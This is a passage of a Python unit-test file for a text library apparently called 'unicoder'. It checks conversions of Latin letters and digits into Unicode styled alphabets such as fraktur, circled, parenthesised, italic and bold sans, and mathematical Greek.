        uni = unicoder.sans(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_447_ital_sans(self) -> None:
        uni = unicoder.ital(unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_448_ital_sans(self) -> None:
        uni = unicoder.sans(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_450_numm_ital_sans(self) -> None:
        uni = unicoder.convert("fix", base_0123456789)
        self.assertEqual(uni, base_0123456789)
    def test_451_numm_ital_sans(self) -> None:
        uni = unicoder.convert("italsans", base_0123456789)
        self.assertEqual(uni, ital_sans_0123456789)
    def test_452_numm_ital_sans(self) -> None:
        uni = unicoder.convert("slantvect", base_0123456789)
        self.assertEqual(uni, ital_sans_0123456789)
    def test_455_numm_ital_sans(self) -> None:
        uni = unicoder.ital(unicoder.sans(base_0123456789))
        self.assertEqual(uni, ital_sans_0123456789)
    def test_456_numm_ital_sans(self) -> None:
        uni = unicoder.sans(unicoder.ital(base_0123456789))
        self.assertEqual(uni, ital_sans_0123456789)
    def test_459_numm_ital_sans(self) -> None:
        self.assertEqual(ital_sans_0123456789, sans_0123456789)
    def test_461_bold_ital_sans(self) -> None:
        uni = unicoder.convert("bolditalsans", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_462_bold_ital_sans(self) -> None:
        uni = unicoder.convert("fatslantvect", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_463_bold_ital_sans(self) -> None:
        uni = unicoder.convert("bolditalsans", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_464_bold_ital_sans(self) -> None:
        uni = unicoder.convert("fatslantvect", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_465_bold_ital_sans(self) -> None:
        uni = unicoder.bold(unicoder.ital(
            unicoder.sans(base_abcdefghijklmnopqrstuvwxyz)))
        self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_466_bold_ital_sans(self) -> None:
        uni = unicoder.ital(unicoder.bold(
            unicoder.sans(base_abcdefghijklmnopqrstuvwxyz)))
        self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_467_bold_ital_sans(self) -> None:
        uni = unicoder.sans(
            unicoder.bold(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz)))
        self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_468_bold_ital_sans(self) -> None:
        uni = unicoder.bold(
            unicoder.sans(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz)))
        self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_469_bold_ital_sans(self) -> None:
        uni = unicoder.ital(
            unicoder.sans(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz)))
        self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_470_bold_ital_sans(self) -> None:
        uni = unicoder.bold(unicoder.ital(
            unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
        self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_471_bold_ital_sans(self) -> None:
        uni = unicoder.ital(unicoder.bold(
            unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
        self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_472_bold_ital_sans(self) -> None:
        uni = unicoder.sans(
            unicoder.bold(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
        self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_473_bold_ital_sans(self) -> None:
        uni = unicoder.bold(
            unicoder.sans(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
        self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_474_bold_ital_sans(self) -> None:
        uni = unicoder.ital(
            unicoder.sans(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
        self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_480_numm_bold_ital_sans(self) -> None:
        uni = unicoder.convert("fix", base_0123456789)
        self.assertEqual(uni, base_0123456789)
    def test_481_numm_bold_ital_sans(self) -> None:
        uni = unicoder.convert("bolditalsans", base_0123456789)
        self.assertEqual(uni, bold_ital_sans_0123456789)
    def test_482_numm_bold_ital_sans(self) -> None:
        uni = unicoder.convert("fatslantvect", base_0123456789)
        self.assertEqual(uni, bold_ital_sans_0123456789)
    def test_485_numm_bold_ital_sans(self) -> None:
        uni = unicoder.bold(unicoder.ital(unicoder.sans(base_0123456789)))
        self.assertEqual(uni, bold_ital_sans_0123456789)
    def test_486_numm_bold_ital_sans(self) -> None:
        uni = unicoder.sans(unicoder.bold(unicoder.ital(base_0123456789)))
        self.assertEqual(uni, bold_ital_sans_0123456789)
    def test_489_numm_bold_ital_sans(self) -> None:
        self.assertEqual(bold_ital_sans_0123456789, bold_sans_0123456789)
    #
    def test_500_norm_frak(self) -> None:
        uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz)
    def test_501_norm_frak(self) -> None:
        uni = unicoder.convert("frak", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷")
    def test_502_norm_frak(self) -> None:
        uni = unicoder.convert("black", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷")
    def test_503_norm_frak(self) -> None:
        uni = unicoder.convert("frak", ":AB-DEFG--JKLMNOPQ-STUVWXY-")
        self.assertEqual(uni, ":𝔄𝔅-𝔇𝔈𝔉𝔊--𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔-𝔖𝔗𝔘𝔙𝔚𝔛𝔜-")
        uni = unicoder.convert("frak", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ")
    def test_504_norm_frak(self) -> None:
        uni = unicoder.convert("black", ":AB-DEFG--JKLMNOPQ-STUVWXY-")
        self.assertEqual(uni, ":𝔄𝔅-𝔇𝔈𝔉𝔊--𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔-𝔖𝔗𝔘𝔙𝔚𝔛𝔜-")
        uni = unicoder.convert("black", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ")
    def test_505_norm_frak(self) -> None:
        uni = unicoder.fraktur(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷")
    def test_506_norm_frak(self) -> None:
        uni = unicoder.fraktur(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷")
    def test_507_norm_frak(self) -> None:
        uni = unicoder.fraktur(":AB-DEFG--JKLMNOPQ-STUVWXY-")
        self.assertEqual(uni, ":𝔄𝔅-𝔇𝔈𝔉𝔊--𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔-𝔖𝔗𝔘𝔙𝔚𝔛𝔜-")
    def test_508_norm_frak(self) -> None:
        uni = unicoder.fraktur(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ")
    def test_510_bold_frak(self) -> None:
        uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz)
    def test_511_bold_frak(self) -> None:
        uni = unicoder.convert("boldfrak", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟")
    def test_512_bold_frak(self) -> None:
        uni = unicoder.convert("boldblack", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟")
    def test_513_bold_frak(self) -> None:
        uni = unicoder.convert("fatfrak", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅")
    def test_514_bold_frak(self) -> None:
        uni = unicoder.convert("boldblack", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅")
    def test_515_bold_frak(self) -> None:
        uni = unicoder.bold(unicoder.fraktur(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, ":𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟")
    def test_516_bold_frak(self) -> None:
        uni = unicoder.bold(unicoder.fraktur(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, ":𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟")
    def test_517_bold_frak(self) -> None:
        uni = unicoder.bold(unicoder.fraktur(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, ":𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅")
    def test_518_bold_frak(self) -> None:
        uni = unicoder.bold(unicoder.fraktur(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, ":𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅")
    #
    def test_550_norm_button(self) -> None:
        uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz)
    def test_551_norm_button(self) -> None:
        uni = unicoder.convert("button", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":🅐🅑🅒🅓🅔🅕🅖🅗🅘🅙🅚🅛🅜🅝🅞🅟🅠🅡🅢🅣🅤🅥🅦🅧🅨🅩")
    def test_552_norm_button(self) -> None:
        uni = unicoder.convert("button", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":🅰🅱🅲🅳🅴🅵🅶🅷🅸🅹🅺🅻🅼🅽🅾🅿🆀🆁🆂🆃🆄🆅🆆🆇🆈🆉")
    def test_553_numm_button(self) -> None:
        uni = unicoder.convert("button", base_0123456789)
        self.assertEqual(uni, ":⓿❶❷❸❹❺❻❼❽❾")
    def test_555_norm_button(self) -> None:
        uni = unicoder.button(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":🅐🅑🅒🅓🅔🅕🅖🅗🅘🅙🅚🅛🅜🅝🅞🅟🅠🅡🅢🅣🅤🅥🅦🅧🅨🅩")
    def test_556_norm_button(self) -> None:
        uni = unicoder.button(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":🅰🅱🅲🅳🅴🅵🅶🅷🅸🅹🅺🅻🅼🅽🅾🅿🆀🆁🆂🆃🆄🆅🆆🆇🆈🆉")
    def test_557_numm_button(self) -> None:
        uni = unicoder.button(base_0123456789)
        self.assertEqual(uni, ":⓿❶❷❸❹❺❻❼❽❾")
    def test_560_norm_circled(self) -> None:
        uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz)
    def test_561_norm_circled(self) -> None:
        uni = unicoder.convert("circ", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":ⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ")
    def test_562_norm_circled(self) -> None:
        uni = unicoder.convert("circ", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏ")
    def test_563_numm_circled(self) -> None:
        uni = unicoder.convert("circ", base_0123456789)
        self.assertEqual(uni, ":⓪①②③④⑤⑥⑦⑧⑨")
    def test_565_norm_circled(self) -> None:
        uni = unicoder.circled(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":ⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ")
    def test_566_norm_circled(self) -> None:
        uni = unicoder.circled(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏ")
    def test_567_numm_circled(self) -> None:
        uni = unicoder.circled(base_0123456789)
        self.assertEqual(uni, ":⓪①②③④⑤⑥⑦⑧⑨")
    def test_570_norm_parens(self) -> None:
        uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz)
    def test_571_norm_parens(self) -> None:
        uni = unicoder.convert("parens", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":⒜⒝⒞⒟⒠⒡⒢⒣⒤⒥⒦⒧⒨⒩⒪⒫⒬⒭⒮⒯⒰⒱⒲⒳⒴⒵")
    def test_572_norm_parens(self) -> None:
        uni = unicoder.convert("parens", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":🄐🄑🄒🄓🄔🄕🄖🄗🄘🄙🄚🄛🄜🄝🄞🄟🄠🄡🄢🄣🄤🄥🄦🄧🄨🄩")
    def test_573_numm_parens(self) -> None:
        uni = unicoder.convert("parens", base_0123456789)
        self.assertEqual(uni, ":⒪⑴⑵⑶⑷⑸⑹⑺⑻⑼")
    def test_575_norm_parens(self) -> None:
        uni = unicoder.parens(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":⒜⒝⒞⒟⒠⒡⒢⒣⒤⒥⒦⒧⒨⒩⒪⒫⒬⒭⒮⒯⒰⒱⒲⒳⒴⒵")
    def test_576_norm_parens(self) -> None:
        uni = unicoder.parens(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":🄐🄑🄒🄓🄔🄕🄖🄗🄘🄙🄚🄛🄜🄝🄞🄟🄠🄡🄢🄣🄤🄥🄦🄧🄨🄩")
    def test_577_numm_parens(self) -> None:
        uni = unicoder.parens(base_0123456789)
        self.assertEqual(uni, ":⒪⑴⑵⑶⑷⑸⑹⑺⑻⑼")
    #
    def test_600_norm_greek(self) -> None:
        uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz)
    def test_601_norm_greek(self) -> None:
        uni = unicoder.convert("greek", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":αβχδεφγηιικλμνοπκρστω∂ψξυζ")
    def test_602_norm_greek(self) -> None:
        uni = unicoder.convert("math", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":αβχδεφγηιικλμνοπκρστω∂ψξυζ")
    def test_603_norm_greek(self) -> None:
        uni = unicoder.convert("greek", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":ΑΒΧΔΕΦΓΗΙΙΚΛΜΝΟΠΚΡΣΤΩ∇ΨΞΥΖ")
    def test_604_norm_greek(self) -> None:
        uni = unicoder.convert("math", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":ΑΒΧΔΕΦΓΗΙΙΚΛΜΝΟΠΚΡΣΤΩ∇ΨΞΥΖ")
    def test_605_norm_greek(self) -> None:
        uni = unicoder.greek(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":αβχδεφγηιικλμνοπκρστω∂ψξυζ")
    def test_606_norm_greek(self) -> None:
        uni = unicoder.greek(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":αβχδεφγηιικλμνοπκρστω∂ψξυζ")
    def test_607_norm_greek(self) -> None:
        uni = unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":ΑΒΧΔΕΦΓΗΙΙΚΛΜΝΟΠΚΡΣΤΩ∇ΨΞΥΖ")
    def test_608_norm_greek(self) -> None:
        uni = unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":ΑΒΧΔΕΦΓΗΙΙΚΛΜΝΟΠΚΡΣΤΩ∇ΨΞΥΖ")
    def test_621_bold_greek(self) -> None:
        uni = unicoder.convert("boldgreek", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝛂𝛃𝛘𝛅𝛆𝛗𝛄𝛈𝛊𝛊𝛋𝛌𝛍𝛎𝛐𝛑𝛋𝛒𝛔𝛕𝛚𝛛𝛙𝛏𝛖𝛇")
    def test_622_bold_greek(self) -> None:
        uni = unicoder.convert("fatmath", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝛂𝛃𝛘𝛅𝛆𝛗𝛄𝛈𝛊𝛊𝛋𝛌𝛍𝛎𝛐𝛑𝛋𝛒𝛔𝛕𝛚𝛛𝛙𝛏𝛖𝛇")
    def test_623_bold_greek(self) -> None:
        uni = unicoder.convert("boldgreek", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝚨𝚩𝚾𝚫𝚬𝚽𝚪𝚮𝚰𝚰𝚱𝚲𝚳𝚴𝚶𝚷𝚱𝚸𝚺𝚻𝛀𝛁𝚿𝚵𝚼𝚭")
    def test_624_bold_greek(self) -> None:
        uni = unicoder.convert("fatmath", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝚨𝚩𝚾𝚫𝚬𝚽𝚪𝚮𝚰𝚰𝚱𝚲𝚳𝚴𝚶𝚷𝚱𝚸𝚺𝚻𝛀𝛁𝚿𝚵𝚼𝚭")
    def test_625_bold_greek(self) -> None:
        uni = unicoder.bold(unicoder.greek(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, ":𝛂𝛃𝛘𝛅𝛆𝛗𝛄𝛈𝛊𝛊𝛋𝛌𝛍𝛎𝛐𝛑𝛋𝛒𝛔𝛕𝛚𝛛𝛙𝛏𝛖𝛇")
    def test_626_bold_greek(self) -> None:
        uni = unicoder.greek(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, ":𝛂𝛃𝛘𝛅𝛆𝛗𝛄𝛈𝛊𝛊𝛋𝛌𝛍𝛎𝛐𝛑𝛋𝛒𝛔𝛕𝛚𝛛𝛙𝛏𝛖𝛇")
    def test_627_bold_greek(self) -> None:
        uni = unicoder.bold(unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, ":𝚨𝚩𝚾𝚫𝚬𝚽𝚪𝚮𝚰𝚰𝚱𝚲𝚳𝚴𝚶𝚷𝚱𝚸𝚺𝚻𝛀𝛁𝚿𝚵𝚼𝚭")
    def test_628_bold_greek(self) -> None:
        uni = unicoder.greek(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, ":𝚨𝚩𝚾𝚫𝚬𝚽𝚪𝚮𝚰𝚰𝚱𝚲𝚳𝚴𝚶𝚷𝚱𝚸𝚺𝚻𝛀𝛁𝚿𝚵𝚼𝚭")
    def test_641_ital_greek(self) -> None:
        uni = unicoder.convert("italgreek", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝛼𝛽𝜒𝛿𝜀𝜑𝛾𝜂𝜄𝜄𝜅𝜆𝜇𝜈𝜊𝜋𝜅𝜌𝜎𝜏𝜔𝜕𝜓𝜉𝜐𝜁")
    def test_642_ital_greek(self) -> None:
        uni = unicoder.convert("slantmath", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝛼𝛽𝜒𝛿𝜀𝜑𝛾𝜂𝜄𝜄𝜅𝜆𝜇𝜈𝜊𝜋𝜅𝜌𝜎𝜏𝜔𝜕𝜓𝜉𝜐𝜁")
    def test_643_ital_greek(self) -> None:
        uni = unicoder.convert("italgreek", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝛢𝛣𝛸𝛥𝛦𝛷𝛤𝛨𝛪𝛪𝛫𝛬𝛭𝛮𝛰𝛱𝛫𝛲𝛴𝛵𝛺𝛻𝛹𝛯𝛶𝛧")
    def test_644_ital_greek(self) -> None:
        uni = unicoder.convert("slantmath", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝛢𝛣𝛸𝛥𝛦𝛷𝛤𝛨𝛪𝛪𝛫𝛬𝛭𝛮𝛰𝛱𝛫𝛲𝛴𝛵𝛺𝛻𝛹𝛯𝛶𝛧")
    def test_645_ital_greek(self) -> None:
        uni = unicoder.ital(unicoder.greek(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, ":𝛼𝛽𝜒𝛿𝜀𝜑𝛾𝜂𝜄𝜄𝜅𝜆𝜇𝜈𝜊𝜋𝜅𝜌𝜎𝜏𝜔𝜕𝜓𝜉𝜐𝜁")
    def test_646_ital_greek(self) -> None:
        uni = unicoder.greek(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, ":𝛼𝛽𝜒𝛿𝜀𝜑𝛾𝜂𝜄𝜄𝜅𝜆𝜇𝜈𝜊𝜋𝜅𝜌𝜎𝜏𝜔𝜕𝜓𝜉𝜐𝜁")
    def test_647_ital_greek(self) -> None:
        uni = unicoder.ital(unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, ":𝛢𝛣𝛸𝛥𝛦𝛷𝛤𝛨𝛪𝛪𝛫𝛬𝛭𝛮𝛰𝛱𝛫𝛲𝛴𝛵𝛺𝛻𝛹𝛯𝛶𝛧")
    def test_648_ital_greek(self) -> None:
        uni = unicoder.greek(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, ":𝛢𝛣𝛸𝛥𝛦𝛷𝛤𝛨𝛪𝛪𝛫𝛬𝛭𝛮𝛰𝛱𝛫𝛲𝛴𝛵𝛺𝛻𝛹𝛯𝛶𝛧")
    def test_661_bold_ital_greek(self) -> None:
        uni = unicoder.convert("bolditalgreek", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻")
    def test_662_bold_ital_greek(self) -> None:
        uni = unicoder.convert("fatslantmath", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻")
    def test_663_bold_ital_greek(self) -> None:
        uni = unicoder.convert("bolditalgreek", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡")
    def test_664_bold_ital_greek(self) -> None:
        uni = unicoder.convert("fatslantmath", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡")
    def test_665_bold_ital_greek(self) -> None:
        uni = unicoder.bold(unicoder.ital(
            unicoder.greek(base_abcdefghijklmnopqrstuvwxyz)))
        self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻")
    def test_666_bold_ital_greek(self) -> None:
        uni = unicoder.greek(
            unicoder.bold(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz)))
        self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻")
    def test_667_bold_ital_greek(self) -> None:
        uni = unicoder.bold(unicoder.ital(
            unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
        self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡")
    def test_668_bold_ital_greek(self) -> None:
        uni = unicoder.ital(unicoder.bold(
            unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
        self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡")
    def test_669_bold_ital_greek(self) -> None:
        uni = unicoder.greek(
            unicoder.bold(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
        self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡")
    def test_670_bold_ital_greek(self) -> None:
        uni = unicoder.bold(
            unicoder.greek(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
        self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡")
    def test_671_bold_ital_greek(self) -> None:
        uni = unicoder.ital(
            unicoder.greek(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
